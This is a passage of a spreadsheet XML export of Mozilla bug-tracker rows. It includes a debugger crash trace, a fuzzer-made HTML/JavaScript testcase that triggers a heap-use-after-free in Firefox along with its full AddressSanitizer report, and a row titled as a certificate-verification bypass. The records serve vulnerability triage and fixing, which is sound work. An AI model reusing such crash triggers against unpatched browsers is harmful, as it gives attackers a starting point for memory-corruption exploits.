xul!`anonymous namespace'::GetCollectionForType+0x8
xul!mozilla::dom::workers::events::ListenerManager::Remove+0x23
xul!mozilla::dom::workers::events::ListenerManager::RemoveEventListener+0x2f
xul!mozilla::dom::workers::events::EventTarget::RemoveEventListener+0x74
mozjs!js::InvokeKernel+0xcf
mozjs!js::Interpret+0x583e
mozjs!js::RunScript+0x98
mozjs!js::ExecuteKernel+0x169
mozjs!EvalKernel+0x2a9
mozjs!js::DirectEval+0x6b
mozjs!js::Interpret+0x5783
mozjs!js::RunScript+0x98
mozjs!js::ExecuteKernel+0x169
mozjs!js::Execute+0x9e
mozjs!EvaluateUCScriptForPrincipalsCommon+0x84
mozjs!JS_EvaluateUCScriptForPrincipalsVersion+0x55
xul!nsJSContext::EvaluateString+0x1ea
xul!nsJSThunk::EvaluateScript+0x64b
xul!nsJSChannel::EvaluateScript+0x2c
xul!nsRunnableMethodImpl&lt;void (__thiscall mozilla::dom::indexedDB::LazyIdleThread::*)(void),0&gt;::Run+0x13
It crashed on following instruction:
xul!`anonymous namespace'::GetCollectionForType:
70e532b0 8b4c2404        mov     ecx,dword ptr [esp+4]
70e532b4 8b01            mov     eax,dword ptr [ecx]
70e532b6 eb0b            jmp     xul!`anonymous namespace'::GetCollectionForType+0x13 (70e532c3)
70e532b8 8b5008          mov     edx,dword ptr [eax+8] ds:002b:24748b5e=????????
70e532bb 3b542408        cmp     edx,dword ptr [esp+8]
70e532bf 7408            je      xul!`anonymous namespace'::GetCollectionForType+0x19 (70e532c9)
70e532c1 8b00            mov     eax,dword ptr [eax]
70e532c3 3bc1            cmp     eax,ecx
70e532c5 75f1            jne     xul!`anonymous namespace'::GetCollectionForType+0x8 (70e532b8)
70e532c7 33c0            xor     eax,eax
70e532c9 c3              ret
reported by nils of vulndev ltd.</t>
        </is>
      </c>
      <c r="X869" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="870">
      <c r="A870" t="n">
        <v>794993</v>
      </c>
      <c r="B870" t="inlineStr">
        <is>
          <t>2012-09-27 09:36:56 -0700</t>
        </is>
      </c>
      <c r="C870" t="inlineStr">
        <is>
          <t>https://releases.mozilla.com/b2g/latest/ returns HTTP 403</t>
        </is>
      </c>
      <c r="D870" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E870" t="n">
        <v>1</v>
      </c>
      <c r="F870" t="n">
        <v>1</v>
      </c>
      <c r="G870" t="n">
        <v>6</v>
      </c>
      <c r="H870" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I870" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J870" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K870" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N870" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P870" t="inlineStr"/>
      <c r="Q870" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R870" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S870" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T870" t="n">
        <v>1</v>
      </c>
      <c r="U870" t="n">
        <v>0</v>
      </c>
      <c r="V870" t="n">
        <v>4</v>
      </c>
      <c r="W870" t="inlineStr">
        <is>
          <t>https://releases.mozilla.com/b2g/latest/ is returning an HTTP 403 error with the usual credentials for that site.  Have the credentials changed?  This is blocking QA testing of B2G, so fixing this is high priority.</t>
        </is>
      </c>
      <c r="X870" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="871">
      <c r="A871" t="n">
        <v>1380292</v>
      </c>
      <c r="B871" t="inlineStr">
        <is>
          <t>2017-07-12 04:58:15 -0700</t>
        </is>
      </c>
      <c r="C871" t="inlineStr">
        <is>
          <t>heap-use-after-free in ~nsStyleContext, nsFrameManager::CaptureFrameState etc</t>
        </is>
      </c>
      <c r="D871" t="inlineStr">
        <is>
          <t>2024-05-30 09:35:21 -0700</t>
        </is>
      </c>
      <c r="E871" t="n">
        <v>1</v>
      </c>
      <c r="F871" t="n">
        <v>1</v>
      </c>
      <c r="G871" t="n">
        <v>3</v>
      </c>
      <c r="H871" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I871" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J871" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K871" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M871" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N871" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P871" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q871" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R871" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S871" t="inlineStr">
        <is>
          <t>mozilla57</t>
        </is>
      </c>
      <c r="T871" t="n">
        <v>1</v>
      </c>
      <c r="U871" t="n">
        <v>0</v>
      </c>
      <c r="V871" t="n">
        <v>33</v>
      </c>
      <c r="W871" t="inlineStr">
        <is>
          <t>Created attachment 8885672
crash.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170711160010). The attached crash.html, crash.xml and crash.xsl have to be served from an HTTP server.
crash.html:
&lt;script&gt;
function spin() {
        var x=new XMLHttpRequest();
        x.open("POST","https://mozilla.org",false);
        try{x.send("X");}catch(e){}
}
function start() {
	o0=document.createElement('iframe');
	o0.src='crash.xml';
	document.body.appendChild(o0);
	o1=document.createElement('iframe');
	o1.src='data:text/html,&lt;div&gt;';
	o0.addEventListener('load', fun0,false);
	document.body.appendChild(o1);
	o2=window.document;
}
function fun0() {
	o4=o1.contentWindow;
	o4.onresize=fun1;
	o16=o0.contentWindow;
	o17=o0.contentDocument;
	tmp=o17.getElementsByTagName('*');
	o18=tmp[0];
	o28=tmp[4];
	o62=o17.createRange();
	o17.designMode='on';
	document.documentElement.appendChild(o18);
	o95=o16.getSelection();
	o95.addRange(o62);
	o1.setAttribute('height','-9px');
	o213=document.createElement('style');
	o62.selectNodeContents(o28);
	document.documentElement.style.transform='scale(100)';
	o2.designMode='on';
	document.documentElement.appendChild(o213);
	o1.setAttribute('height','-9px');
	spin();
	o95.modify('extend', 'forward','lineboundary');
}
function fun1() {
	o268=document.createElement('iframe');
	o268.addEventListener('load', fun2,false);
	o213.appendChild(o268);
}
function fun2() {
	document.body.appendChild(o0);
	o0.appendChild(o1);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	location.reload();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==6893==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000380ce8 at pc 0x7efbe71a2dc0 bp 0x7fffb2c01f30 sp 0x7fffb2c01f28
READ of size 8 at 0x625000380ce8 thread T0 (Web Content)
    #0 0x7efbe71a2dbf in GetStateBits /home/worker/workspace/build/src/layout/generic/nsIFrame.h:1997:46
    #1 0x7efbe71a2dbf in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:497
    #2 0x7efbe71a2b7c in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:504:7
    #3 0x7efbe71a2b7c in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:504:7
    #4 0x7efbe71a2b7c in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:504:7
    #5 0x7efbe71a2b7c in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:504:7
    #6 0x7efbe71a2b7c in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsFrameManager.cpp:504:7
    #7 0x7efbe70ea933 in mozilla::PresShell::CaptureHistoryState(nsILayoutHistoryState**) /home/worker/workspace/build/src/layout/base/PresShell.cpp:3876:22
    #8 0x7efbea114525 in nsDocShell::PersistLayoutHistoryState() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:12768:19
    #9 0x7efbea1216fb in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7315:3
    #10 0x7efbea0b9521 in nsDocShell::CreateContentViewer(nsACString const&amp;, nsIRequest*, nsIStreamListener**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9297:3
    #11 0x7efbea0b742e in nsDSURIContentListener::DoContent(nsACString const&amp;, bool, nsIRequest*, nsIStreamListener**, bool*) /home/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:114:21
    #12 0x7efbe1f33397 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:756:28
    #13 0x7efbe1f304cc in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:434:30
    #14 0x7efbe1f2ec40 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:296:8
    #15 0x7efbe0dd5ae6 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /home/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:662:28
    #16 0x7efbe0de168c in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, bool const&amp;, bool const&amp;, int const&amp;, unsigned int const&amp;, unsigned int const&amp;, nsCString const&amp;, nsCString const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, unsigned int const&amp;, nsCString const&amp;, long const&amp;) /home/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:593:3
    #17 0x7efbe0ebbb0c in mozilla::net::StartRequestEvent::Run() /home/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:425:13
    #18 0x7efbe0cba127 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:215:10
    #19 0x7efbe0de06a0 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&amp;, mozilla::net::nsHttpResponseHead const&amp;, bool const&amp;, mozilla::net::nsHttpHeaderArray const&amp;, bool const&amp;, bool const&amp;, int const&amp;, unsigned int const&amp;, unsigned int const&amp;, nsCString const&amp;, nsCString const&amp;, mozilla::net::NetAddr const&amp;, mozilla::net::NetAddr const&amp;, short const&amp;, unsigned int const&amp;, nsCString const&amp;, long const&amp;) /home/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:482:12
    #20 0x7efbe13f4576 in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:637:20
    #21 0x7efbe19f4c5d in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:5296:28
    #22 0x7efbe123018e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #23 0x7efbe122d2d4 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #24 0x7efbe122ebb4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #25 0x7efbe122f198 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #26 0x7efbe03f2490 in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
    #27 0x7efbe041f875 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1437:14
    #28 0x7efbe0425aa8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #29 0x7efbe1237e36 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #30 0x7efbe11940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #31 0x7efbe11940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #32 0x7efbe11940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #33 0x7efbe69c237f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #34 0x7efbeac50817 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #35 0x7efbe11940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #36 0x7efbe11940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #37 0x7efbe11940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #38 0x7efbeac5027d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #39 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #40 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #41 0x7efbfd7d882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #42 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x625000380ce8 is located 7144 bytes inside of 8192-byte region [0x62500037f100,0x625000381100)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7efbe7238d10 in Clear /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:98:7
    #2 0x7efbe7238d10 in ~ArenaAllocator /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:61
    #3 0x7efbe7238d10 in nsPresArena::~nsPresArena() /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:42
    #4 0x7efbe70cdb43 in nsIPresShell::~nsIPresShell() /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:178:7
    #5 0x7efbe70cdc7d in mozilla::PresShell::~PresShell() /home/worker/workspace/build/src/layout/base/PresShell.cpp:900:1
    #6 0x7efbe70c93ef in Release /home/worker/workspace/build/src/layout/base/PresShell.cpp:894:1
    #7 0x7efbe70c93ef in non-virtual thunk to mozilla::PresShell::Release() /home/worker/workspace/build/src/layout/base/PresShell.cpp:894
    #8 0x7efbe6ab9425 in ~nsCOMPtr_base /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:294:7
    #9 0x7efbe6ab9425 in nsTextServicesDocument::~nsTextServicesDocument() /home/worker/workspace/build/src/editor/txtsvc/nsTextServicesDocument.cpp:96
    #10 0x7efbe6ab981d in nsTextServicesDocument::~nsTextServicesDocument() /home/worker/workspace/build/src/editor/txtsvc/nsTextServicesDocument.cpp:94:1
    #11 0x7efbe02bbc47 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
    #12 0x7efbe02c5dd4 in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
    #13 0x7efbe02c5dd4 in nsCycleCollector_doDeferredDeletion() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4187
    #14 0x7efbe1cf0e13 in AsyncFreeSnowWhite::Run() /home/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:126:34
    #15 0x7efbe0434a7f in IdleRunnableWrapper::Run() /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:313:22
    #16 0x7efbe041f875 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1437:14
    #17 0x7efbe0425aa8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #18 0x7efbe1237e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #19 0x7efbe11940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #20 0x7efbe11940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #21 0x7efbe11940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #22 0x7efbe69c237f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #23 0x7efbeac50817 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #24 0x7efbe11940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #25 0x7efbe11940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #26 0x7efbe11940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #27 0x7efbeac5027d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #28 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #29 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #30 0x7efbfd7d882f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7efbe03d6fdf in AllocateChunk /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:179:15
    #2 0x7efbe03d6fdf in InternalAllocate /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:214
    #3 0x7efbe03d6fdf in Allocate /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:72
    #4 0x7efbe03d6fdf in mozilla::ArenaAllocator&lt;8192ul, 8ul&gt;::Allocate(unsigned long) /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/ArenaAllocator.h:77
    #5 0x7efbe6f53430 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:51:12
    #6 0x7efbe6f53430 in AllocateByObjectID /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:237
    #7 0x7efbe6f53430 in operator new /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1788
    #8 0x7efbe6f53430 in nsRuleNode::Transition(nsIStyleRule*, mozilla::SheetType, bool) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1900
    #9 0x7efbe6e89e1d in DoForward /home/worker/workspace/build/src/layout/style/nsRuleWalker.h:31:26
    #10 0x7efbe6e89e1d in Forward /home/worker/workspace/build/src/layout/style/nsRuleWalker.h:42
    #11 0x7efbe6e89e1d in ContentEnumFunc(RuleValue const&amp;, nsCSSSelector*, ElementDependentRuleProcessorData*, NodeMatchContext&amp;, AncestorFilter*) /home/worker/workspace/build/src/layout/style/nsCSSRuleProcessor.cpp:2606
    #12 0x7efbe6e8946a in RuleHash::EnumerateAllRules(mozilla::dom::Element*, ElementDependentRuleProcessorData*, NodeMatchContext&amp;) /home/worker/workspace/build/src/layout/style/nsCSSRuleProcessor.cpp:697:7
    #13 0x7efbe6e94a1f in nsCSSRuleProcessor::RulesMatching(ElementRuleProcessorData*) /home/worker/workspace/build/src/layout/style/nsCSSRuleProcessor.cpp:2620:24
    #14 0x7efbe6fe584c in bool EnumRulesMatching&lt;ElementRuleProcessorData&gt;(nsIStyleRuleProcessor*, void*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:795:15
    #15 0x7efbe6fe285d in nsStyleSet::FileRules(bool (*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*, mozilla::dom::Element*, nsRuleWalker*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1121:5
    #16 0x7efbe6fe545e in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1353:3
    #17 0x7efbe6fe5050 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1389:10
    #18 0x7efbe70ae366 in mozilla::ElementRestyler::RestyleSelf(nsIFrame*, nsRestyleHint, unsigned int*, nsTArray&lt;mozilla::ElementRestyler::SwapInstruction&gt;&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:2545:32
    #19 0x7efbe70a9c92 in mozilla::ElementRestyler::Restyle(nsRestyleHint) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:1795:7
    #20 0x7efbe70b5ceb in mozilla::ElementRestyler::ComputeStyleChangeFor(nsIFrame*, nsStyleChangeList*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;, nsTArray&lt;mozilla::ElementRestyler::ContextToClear&gt;&amp;, nsTArray&lt;RefPtr&lt;nsStyleContext&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:3063:16
    #21 0x7efbe709ff62 in mozilla::GeckoRestyleManager::ComputeAndProcessStyleChange(nsIFrame*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:3474:3
    #22 0x7efbe709f4be in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:151:5
    #23 0x7efbe7127dff in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:94:22
    #24 0x7efbe7127dff in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:255
    #25 0x7efbe70a3906 in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:371:23
    #26 0x7efbe70a3906 in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:502
    #27 0x7efbe70ecf7e in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #28 0x7efbe70ecf7e in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4193
    #29 0x7efbe70dba12 in mozilla::PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9164:3
    #30 0x7efbe70ee2a8 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9521:7
    #31 0x7efbe70ed154 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4230:11
    #32 0x7efbe71c4521 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:578:5
    #33 0x7efbe71c4521 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1033
    #34 0x7efbea1292aa in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
    #35 0x7efbea1252b0 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
    #36 0x7efbea12ca3f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
    #37 0x7efbe1f267e2 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1299:3
    #38 0x7efbe1f257dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:860:14
    #39 0x7efbe1f225d8 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:749:9
    #40 0x7efbe1f244ef in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:631:5
    #41 0x7efbe1f2521c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:487:14
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/generic/nsIFrame.h:1997:46 in GetStateBits
Shadow bytes around the buggy address:
  0x0c4a80068140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80068150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80068160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80068170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a80068180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c4a80068190: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0c4a800681a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800681b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800681c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800681d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a800681e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6893==ABORTING</t>
        </is>
      </c>
      <c r="X871" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="872">
      <c r="A872" t="n">
        <v>1148328</v>
      </c>
      <c r="B872" t="inlineStr">
        <is>
          <t>2015-03-27 02:04:08 -0700</t>
        </is>
      </c>
      <c r="C872" t="inlineStr">
        <is>
          <t>Server certificate verification bypass with Alt-Svc</t>
        </is>
      </c>
      <c r="D872" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:43 -0700</t>
        </is>
      </c>
      <c r="E872" t="n">
        <v>1</v>
      </c>
      <c r="F872" t="n">
        <v>1</v>
      </c>
      <c r="G872" t="n">
        <v>3</v>
      </c>
      <c r="H872" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I872" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J872" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K872" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L872" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M872" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N872" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P872" t="inlineStr"/>
      <c r="Q872" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R872" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
